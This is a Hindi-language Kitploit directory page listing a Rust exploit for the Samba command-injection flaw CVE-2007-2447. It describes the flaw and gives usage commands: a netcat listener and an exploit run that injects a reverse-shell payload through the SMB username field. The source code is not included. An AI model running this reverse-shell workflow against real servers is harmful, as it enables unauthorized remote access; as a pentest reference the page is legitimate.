Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2007-2447 — CVE-2007-2447 एक्सप्लॉइट का एक स्टैंडअलोन Rust कार्यान्वयन, जो Samba smbd 3.0.20-Debian को लक्षित करता है। | Kitploit
उपकरण/GitHubGitHub/nika0x38/cve-2007-2447
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

CVE-2007-2447 एक्सप्लॉइट का एक स्टैंडअलोन Rust कार्यान्वयन, जो Samba smbd 3.0.20-Debian को लक्षित करता है।

रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2007-2447 Samba एक्सप्लॉइट

Rust Security

CVE-2007-2447 एक्सप्लॉइट का एक स्टैंडअलोन Rust कार्यान्वयन जो Samba smbd 3.0.20-Debian को लक्षित करता है।

भेद्यता विवरण

CVE-2007-2447, Samba संस्करण 3.0.0 से 3.0.25rc3 में एक कमांड इंजेक्शन भेद्यता है। यह भेद्यता SamrChangePassword() फ़ंक्शन में मौजूद है, जो उपयोगकर्ता इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे हमलावर SMB प्रमाणीकरण के दौरान उपयोगकर्ता नाम क्षेत्र में शेल मेटाकैरेक्टर के माध्यम से मनमाना कमांड निष्पादित कर सकते हैं।

पूर्वापेक्षाएँ

  • आपके सिस्टम पर Rust स्थापित हो
  • लक्ष्य पर भेद्य Samba संस्करण चल रहा हो
  • लक्ष्य पर netcat उपलब्ध हो (आमतौर पर डिफ़ॉल्ट रूप से स्थापित होता है)

उपयोग

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

उदाहरण

root@kitploit:~
# Set up a netcat listener
nc -lvnp 4444

# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

विकल्प

  • --lhost: आपकी हमला करने वाली मशीन का IP पता
  • --lport: रिवर्स शेल कनेक्शन प्राप्त करने के लिए पोर्ट
  • --target: लक्ष्य मशीन का IP पता

यह कैसे काम करता है

  1. कोड में सीधे netcat रिवर्स शेल पेलोड उत्पन्न करता है
  2. बैकटिक्स का उपयोग करके पेलोड को SMB उपयोगकर्ता नाम फ़ील्ड में इंजेक्ट करता है
  3. पोर्ट 445 पर एक विकृत SMB Session Setup अनुरोध भेजता है
  4. Samba के उपयोगकर्ता नाम प्रोसेसिंग में कमांड इंजेक्शन का शोषण करता है
  5. लक्ष्य पर रिवर्स शेल पेलोड निष्पादित करता है

विशेषताएँ

  • स्टैंडअलोन: Metasploit जैसी कोई बाहरी निर्भरता आवश्यक नहीं
  • पोर्टेबल: Rust स्थापित किसी भी सिस्टम पर काम करता है
  • तेज़: कोई बाहरी प्रोसेस स्पॉनिंग नहीं

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत पेनेट्रेशन टेस्टिंग उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें